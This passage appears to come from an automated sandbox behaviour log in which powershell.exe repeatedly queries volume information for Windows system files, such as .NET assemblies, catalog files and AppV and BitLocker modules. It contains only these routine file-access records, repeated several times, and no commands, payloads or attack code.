                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
